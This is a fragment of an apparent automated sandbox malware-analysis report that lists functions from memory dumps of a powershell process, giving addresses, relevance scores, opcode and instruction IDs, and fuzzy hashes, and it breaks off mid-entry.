                                                    • Instruction Fuzzy Hash: DC916370B006185BDB1ADFB498516AF7BE2EF84704B04C91DE14AAB740DF34AE06CBD6
                                                    Function 041CA9B0 Relevance: .3, Instructions: 252COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ea5f690d8c5f27820840f0e8201308e8a59072d4f7428042ac4dfdda2826ae0c
                                                    • Instruction ID: f73e2a92d2a97b7e7c40f2d8e79c3347941c1be9d4a8ab0ad3ab39dd89eb9818
                                                    • Opcode Fuzzy Hash: ea5f690d8c5f27820840f0e8201308e8a59072d4f7428042ac4dfdda2826ae0c
                                                    • Instruction Fuzzy Hash: 289154B0B006185BDB19EFB498516AE77E2EF84704B04C91DE14AAB740DF34AE06CBD6
                                                    Function 04571B88 Relevance: 2.8, Strings: 2, Instructions: 293COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2245304363.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_4570000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4']q$4']q
                                                    • API String ID: 0-3120983240
                                                    • Opcode ID: b3ce43b93b4886493e39efddbdb823cc0db0b65e1cdaafc72da60264bb6638b8
                                                    • Instruction ID: a5ecd3be2025120d53d53a7ae01f3e3b99a5c6e6a87c4a5d46561ab58b07d8eb
                                                    • Opcode Fuzzy Hash: b3ce43b93b4886493e39efddbdb823cc0db0b65e1cdaafc72da60264bb6638b8
                                                    • Instruction Fuzzy Hash: 53A1F231B00608DFCB149FA8E410AAABFE6FF85311F14C47AD9458B351EB31E981DBA1
                                                    Function 041CB528 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (aq
                                                    • API String ID: 0-600464949
                                                    • Opcode ID: 79e5b3baeb03569851c7a132363890e93940c714e4f1d2f8745a1bd32598f9e1
                                                    • Instruction ID: c05bb326a0f13dca5215c09e96b3aa28c619620a0c7b4c41d8400110dc4149e4
                                                    • Opcode Fuzzy Hash: 79e5b3baeb03569851c7a132363890e93940c714e4f1d2f8745a1bd32598f9e1
                                                    • Instruction Fuzzy Hash: A921F1723082148FD3099B78E8949AFBB9AEFC4360714853ED606C7245DE39E806C7A0
                                                    Function 041CB430 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: </Bl
                                                    • API String ID: 0-786667820
                                                    • Opcode ID: 96ea1f0cbccd0d3faad312e2fe32bc7184cd0959d50fd4c89bc96da98fd09105
                                                    • Instruction ID: a8f99b7f5c0e3bfc78c06bea90a1a15c445925bb5ddb5e1d52e34b6cff0ae7c5
                                                    • Opcode Fuzzy Hash: 96ea1f0cbccd0d3faad312e2fe32bc7184cd0959d50fd4c89bc96da98fd09105
                                                    • Instruction Fuzzy Hash: 4E31D2307082049FCB15CF69D985AAABBF6EF99300F04846EE54ACB365DB75F905CB90
                                                    Function 041CA4B8 Relevance: 1.3, Strings: 1, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (&]q
                                                    • API String ID: 0-1343553580
                                                    • Opcode ID: dddbfe87cf2533589b92e5e589e081861e31a467f1934bb1a18c9a9b0aa1f6b1
                                                    • Instruction ID: 1281fb3d4b8fa0f604886862ec0dd0f6f24ac419fd7ecc44998866c9658291c8
                                                    • Opcode Fuzzy Hash: dddbfe87cf2533589b92e5e589e081861e31a467f1934bb1a18c9a9b0aa1f6b1
                                                    • Instruction Fuzzy Hash: ABE0DF12B082AC0B8B1EA23E783052F2E8B9AC2A6031DC0BED508C7341DD09DC0247E6
                                                    Function 04571F49 Relevance: 1.1, Instructions: 1136COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2245304363.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_4570000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9c61a3bf1f264f94cf115cb71eb14ece617c79bf95de8e41637c8655e03b5ba7
                                                    • Instruction ID: 07909c4d68eefb57e97b2de77ab2d1f95ae5fca4ebc67d5c5936866d94ac43ca
                                                    • Opcode Fuzzy Hash: 9c61a3bf1f264f94cf115cb71eb14ece617c79bf95de8e41637c8655e03b5ba7
                                                    • Instruction Fuzzy Hash: 25410671B00205CFDB119B68A440AAABBE6FF85311F1484BAE505DB352EB31ED45D771
                                                    Function 041C29F0 Relevance: .2, Instructions: 209COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 215644c826068ceb61ead6d7420152c3f45ba0def3cdfc7c867686487452ace1
                                                    • Instruction ID: 92fb9ad59085ce86f3e63b60879f4efe5123db1d539776f34852fba2b805017d
                                                    • Opcode Fuzzy Hash: 215644c826068ceb61ead6d7420152c3f45ba0def3cdfc7c867686487452ace1
                                                    • Instruction Fuzzy Hash: BE916974A002059FCB15CF59C9D4AAEFBB1FF48310B2485A9D815AB3A5C735FC91CBA4
                                                    Function 04571938 Relevance: .2, Instructions: 197COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2245304363.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_4570000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ffa71f4e33136136455ba311c374daf65b8bd3092ca71e56437e9a1ea152e5fc
                                                    • Instruction ID: 74f21eef9e24426363ae9d89aad24e85d0e859ad60396b89f0577839bc4d7404
                                                    • Opcode Fuzzy Hash: ffa71f4e33136136455ba311c374daf65b8bd3092ca71e56437e9a1ea152e5fc
                                                    • Instruction Fuzzy Hash: 13516731704604CFCB149BADA440AAAFBE6FFC5311B18857BD945CB356EA31ED42D3A2
                                                    Function 041C6C48 Relevance: .2, Instructions: 160COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 246bb89c1352263c8fa8952ff1df6347cd5da14f6012f5c72c26701d410c98c3
                                                    • Instruction ID: 7f2c3ecee51615101dfbd498031a64d65be912af5664e4e86bd86840aebaf9d1
                                                    • Opcode Fuzzy Hash: 246bb89c1352263c8fa8952ff1df6347cd5da14f6012f5c72c26701d410c98c3
                                                    • Instruction Fuzzy Hash: F651CE753002059FD7149B69DC84A7A77EAEFC9354B1584B9E50ACB352EB35EC028BA0
                                                    Function 041CAFD1 Relevance: .2, Instructions: 155COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ee07a6d366ac81f00a3c6a6b06c0e71d760fe0b50483a3e69242d98f6c98fe76
                                                    • Instruction ID: 0e63ecea96eac4b6fb91f1858c07a44e5369522f7fa3035c5b9e04ff691f4620
                                                    • Opcode Fuzzy Hash: ee07a6d366ac81f00a3c6a6b06c0e71d760fe0b50483a3e69242d98f6c98fe76
                                                    • Instruction Fuzzy Hash: 2A5108B1E002089FDB14DFA9E985ADDBBF5FF88310F14816AE809EB354DB34A945CB50
                                                    Function 041CAFE0 Relevance: .2, Instructions: 155COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 26b0c05c5f7928c8bd329db23cbc62a4c8c95444e0ef20cffb66ea29657eb2cc
                                                    • Instruction ID: 6c982e3731ddb87e1b8bcf1d422aa589f3f391b2edad173dcca32c34624998ac
                                                    • Opcode Fuzzy Hash: 26b0c05c5f7928c8bd329db23cbc62a4c8c95444e0ef20cffb66ea29657eb2cc
                                                    • Instruction Fuzzy Hash: F26119B1E002489FDB14CFA9E985B9DBBF5FF98310F148169E809EB354EB34A945CB50
                                                    Function 041C6A98 Relevance: .1, Instructions: 129COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a51655dce8b0306004ab145a9e9ef393dcb4928d6514380f50ac2c74312f15f9
                                                    • Instruction ID: 769282d70de9a805d884b06ef044d06f562a48a00fab4c45ed93158c9c621274
                                                    • Opcode Fuzzy Hash: a51655dce8b0306004ab145a9e9ef393dcb4928d6514380f50ac2c74312f15f9
                                                    • Instruction Fuzzy Hash: 2031B0753002044FC714DB7DE8D4A6A7BD7EFC836471880A9E609CB755DF25EC028791
                                                    Function 041C2B00 Relevance: .1, Instructions: 108COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 70960bd765e036418993fffcb18f8dbf99456f452d6c5f9bcf4739a462725387
                                                    • Instruction ID: 0c78f146fab0e422330a342659e90a8914d136273c39af9bb6c43f74abc23f1e
                                                    • Opcode Fuzzy Hash: 70960bd765e036418993fffcb18f8dbf99456f452d6c5f9bcf4739a462725387
                                                    • Instruction Fuzzy Hash: B8411674A005059FCB09CF59C5D8AEAFBB1FF48310B2186A9D915AB364C736FC91CBA4
                                                    Function 041C6958 Relevance: .1, Instructions: 101COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4265e32d1fa38d5d96193b7a2a66d4ab9a45f3790521cc6af85936a6069db7cc
                                                    • Instruction ID: 320d3044eb02cdb98bf6e069ac639df1082cb80be6dc920d638533c54abed105
                                                    • Opcode Fuzzy Hash: 4265e32d1fa38d5d96193b7a2a66d4ab9a45f3790521cc6af85936a6069db7cc
                                                    • Instruction Fuzzy Hash: 9D310D35B002058FDB14DF64C994AADBBF1EF8D715F1580A8E406AB361DB31ED42CB61
                                                    Function 041C6968 Relevance: .1, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e5650fd55a5deb76d574d9ce8212ace7fdc34cf76754c10820b92ad9b246bc3c
                                                    • Instruction ID: 8c57755c68cbd6d8a76c9b8986fd48b4c4ed8adc6fae46fa3d4082612e0cd122
                                                    • Opcode Fuzzy Hash: e5650fd55a5deb76d574d9ce8212ace7fdc34cf76754c10820b92ad9b246bc3c
                                                    • Instruction Fuzzy Hash: 9531FA34B00204CFDB14DF64C994AADBBF1AF8D715F1450A8E406AB3A1DB31EC42CB51
                                                    Function 04571D28 Relevance: .1, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2245304363.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_4570000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 225e22cb8adbc0c81188bdb1b52b7b7a6aa3704decba9a0d8587a498f3edf4d9
                                                    • Instruction ID: 9dd1ebcf922312f62d4130444881f3fad6357e51a4f47ee847b20dca589b6bda
                                                    • Opcode Fuzzy Hash: 225e22cb8adbc0c81188bdb1b52b7b7a6aa3704decba9a0d8587a498f3edf4d9
                                                    • Instruction Fuzzy Hash: A5311430A04A18EFDB24CE59F444BA9BBA1BB44751F15C4B6E8088B350E730F980EB91
                                                    Function 041CA38F Relevance: .1, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 78182c6261a62dd91867d9f1e6625bb62f3db2dd4195044d3518cea09f2b9d7f
                                                    • Instruction ID: 844253f16dd60cfcbcf3773402d3bee3023482927b2fecccedfbdde94bd99560
                                                    • Opcode Fuzzy Hash: 78182c6261a62dd91867d9f1e6625bb62f3db2dd4195044d3518cea09f2b9d7f
                                                    • Instruction Fuzzy Hash: E9314A70A002099FDB05DFB9D8A57AEBBF6EF88344F148069E405EB754EB349C41CBA1
                                                    Function 041CA390 Relevance: .1, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e6c19a81a7fcb660ca97b6f44d0c59cee22de042de887b8c2a1ba388a2461db8
                                                    • Instruction ID: 87e05a8ebca9307eaa2bde10231fd44297e5c0b5a5df5c37128d3b9661e45d48
                                                    • Opcode Fuzzy Hash: e6c19a81a7fcb660ca97b6f44d0c59cee22de042de887b8c2a1ba388a2461db8
                                                    • Instruction Fuzzy Hash: 44314A70A002099FDB05DFA9D8A47AEBBF6EF88344F148069E405EB754EB349C01CBA1
                                                    Function 041CA257 Relevance: .1, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e5c1d13303181b5573b42328e0a82dfc8371dbf2ffd18981554a91df63706bf7
                                                    • Instruction ID: 4b920c6718dca557f99b6cf06d4ec700e537fc1bd4db667ef4f1263110075921
                                                    • Opcode Fuzzy Hash: e5c1d13303181b5573b42328e0a82dfc8371dbf2ffd18981554a91df63706bf7
                                                    • Instruction Fuzzy Hash: E03171B4A002099FDB04EFA4D855BBEB7B6EF84300F108469D615AB395DB39ED01CF61
                                                    Function 041CA258 Relevance: .1, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4ab39cd28f1f8caafe2dbded9f7885dee3ce13b473ea15cf90d565b3a99d332d
                                                    • Instruction ID: 74a69e8d6ccc19d292595afb461b48fc0e1a68369491952160d862a71ed9aea9
                                                    • Opcode Fuzzy Hash: 4ab39cd28f1f8caafe2dbded9f7885dee3ce13b473ea15cf90d565b3a99d332d
                                                    • Instruction Fuzzy Hash: 83317FB4A002099FDB04EFA4D895BBEB7B6EF84300F108469D615AB395DB39ED01CF61
                                                    Function 009FF238 Relevance: .1, Instructions: 76COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2200622129.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_9fd000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 13c436cb40ca9a49e5ab5f117e65e0922591fe7fec01d0021e87aa6aee7a2477
                                                    • Instruction ID: 4fd635e511716ec9a681baf1c3706252ce066617e500c6eca8d66b63d03bf5ec
                                                    • Opcode Fuzzy Hash: 13c436cb40ca9a49e5ab5f117e65e0922591fe7fec01d0021e87aa6aee7a2477
                                                    • Instruction Fuzzy Hash: D0210075604208DFCB05CF14D9D0B26BF69FF88314F24C9B9EA090A296C33AD816DB61
                                                    Function 04571910 Relevance: .1, Instructions: 73COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2245304363.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_4570000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4296b59840fa548a6c2e6a1e3477d45434f26cd443c703ccef903db9b8d45eee
                                                    • Instruction ID: 82775f7a3574f3b5e2ba3c5f12244797621b05c10630dcad3cd25aff37b69e3a
                                                    • Opcode Fuzzy Hash: 4296b59840fa548a6c2e6a1e3477d45434f26cd443c703ccef903db9b8d45eee
                                                    • Instruction Fuzzy Hash: 2321FF30A08745DFCB11CF69E444AA6BBF0BF46220F0982B7D5488B357D730E846DBA2
                                                    Function 041C8920 Relevance: .1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3f80096828f9bed5262a4f756a1bdf9fed8e9044b677c3f2ffcfa1f7b3cb885d
                                                    • Instruction ID: 6b1fd3afb9960d1b242d4ac0952ee8e581ca8a81c221fb18e4594a351197a90d
                                                    • Opcode Fuzzy Hash: 3f80096828f9bed5262a4f756a1bdf9fed8e9044b677c3f2ffcfa1f7b3cb885d
                                                    • Instruction Fuzzy Hash: C72187B0A017448EDB60DF6AC8C838AFFE6EF98314F28C06ED40DA7245C774A481CB61
                                                    Function 041C8922 Relevance: .1, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 683b3d458ec196470567841790f5404a7081e73fb630bd13bd2cc32a337a43b2
                                                    • Instruction ID: fe4cceea638a5221b184695eca42c4a88a87dc28dac73e84b50b2b4567c20186
                                                    • Opcode Fuzzy Hash: 683b3d458ec196470567841790f5404a7081e73fb630bd13bd2cc32a337a43b2
                                                    • Instruction Fuzzy Hash: AE2157B0A017448EDB60DF6AD8C839AFFE2EF98314F28C06ED45DA7255C7746481CB61
                                                    Function 009FF233 Relevance: .1, Instructions: 57COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2200622129.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_9fd000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                                                    • Instruction ID: 88e77e46c3a578633345f2eca96d7f90773e513b8f77ae9b1314bf32161ba6bf
                                                    • Opcode Fuzzy Hash: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                                                    • Instruction Fuzzy Hash: A621AC76504244DFCB06CF10D9D4B26BF62FF48314F24C5A9DA494B666C33AD86ACBA1
                                                    Function 041CD118 Relevance: .0, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 77cec906cff63b4526de3bfd6769e6fa884e8a735a657ac32bb48a2810edea43
                                                    • Instruction ID: fbf356260d6b7377bdc14d1aec999a7e4e91f9d37daa7ac9db976e3a68d49187
                                                    • Opcode Fuzzy Hash: 77cec906cff63b4526de3bfd6769e6fa884e8a735a657ac32bb48a2810edea43
                                                    • Instruction Fuzzy Hash: 99111734204754CFC728DF75D48085ABBF6EF8931572089ADD08A8B7A0DB36F846CB50
                                                    Function 009FD01D Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2200622129.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_9fd000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: aa49ddbb844557138a48ed30a6cb740a2ea5eaee6c13bfa1cbed22d35c7ff489
                                                    • Instruction ID: accc2da51f290fa07bb9ae5a9724234f577d851751f6c677b12a8a1b79cdf956
                                                    • Opcode Fuzzy Hash: aa49ddbb844557138a48ed30a6cb740a2ea5eaee6c13bfa1cbed22d35c7ff489
                                                    • Instruction Fuzzy Hash: 7F012B310063089ED7208A25CD84B77BF9CEF46324F1CC42AEE580B246CA7D9C45C7B1
                                                    Function 009FD006 Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2200622129.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_9fd000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bc384a9a75a3a30b8ddf38f9d39783b1e2c0ef246eddfd95dc4e6b3183393d6a
                                                    • Instruction ID: 03a585a4fcd33cc95a503d6967fc77a4203bc3e6ec1d434b6c22cf3502ba3a38
                                                    • Opcode Fuzzy Hash: bc384a9a75a3a30b8ddf38f9d39783b1e2c0ef246eddfd95dc4e6b3183393d6a
                                                    • Instruction Fuzzy Hash: 0C01407100E3C49ED7128B258C94662BFB8DF53224F1DC0DBD9888F1A3C2695C49C772
                                                    Function 041CD3A0 Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a2eb7d9df025ccc436d980bcf50362988c38ab151d98946470a9f46dc5c902d0
                                                    • Instruction ID: d465b1485a6fd35cc0e346aac34bddd3de745d8c1305261bbb4802b5c8746376
                                                    • Opcode Fuzzy Hash: a2eb7d9df025ccc436d980bcf50362988c38ab151d98946470a9f46dc5c902d0
                                                    • Instruction Fuzzy Hash: 89010C72304A509FC7199BA9E898B5A7BAAFB89315F14446CF50E87241CB356C46CB50
                                                    Function 041C2C5C Relevance: .0, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 26cad8a32f4e5210192c7d147064380d02353de5a53cda0f6920c627abef6693
                                                    • Instruction ID: d7fc01e5adc12f9501c6478d929e66c647819109d457cd39f8b9349b5d1a1d61
                                                    • Opcode Fuzzy Hash: 26cad8a32f4e5210192c7d147064380d02353de5a53cda0f6920c627abef6693
                                                    • Instruction Fuzzy Hash: 0301B934A091549FCB02CF9DD9E0DEDBF70EF49320B1441D5D5545B262C336E855CB54
                                                    Function 041CD391 Relevance: .0, Instructions: 40COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f8c7014eeed4b240ce4fecc24ef96c19bf5a9b96cc648afb42a963876a960870
                                                    • Instruction ID: 36916344f316b578256cb710fd0d2dde7f140cd4fb1fc29e3bf931b420debfbf
                                                    • Opcode Fuzzy Hash: f8c7014eeed4b240ce4fecc24ef96c19bf5a9b96cc648afb42a963876a960870
                                                    • Instruction Fuzzy Hash: 55F0C8712047949FC3195B75E88875A7FAAEFC6311F0401ADF54EC7282CB396D45C790
                                                    Function 041C6E5F Relevance: .0, Instructions: 40COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: da81014789b80ba45d47d6c3cad316afa0288b0de54501439260d3a8660e47be
                                                    • Instruction ID: 069ccf236c18d4fd2ca4e3ea730d81f27a2ec92ff00bc0ea98cec30c37fb5149
